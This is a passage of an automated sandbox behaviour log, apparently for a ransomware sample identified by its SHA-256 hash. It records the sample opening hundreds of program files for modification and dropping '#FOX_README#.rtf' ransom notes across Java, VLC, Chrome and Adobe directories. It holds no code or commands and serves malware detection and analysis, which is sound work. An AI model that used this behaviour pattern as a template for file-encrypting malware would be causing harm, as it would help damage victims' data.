Firefox\plugin-hang-ui.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\EditSwitch.tif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-templates.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 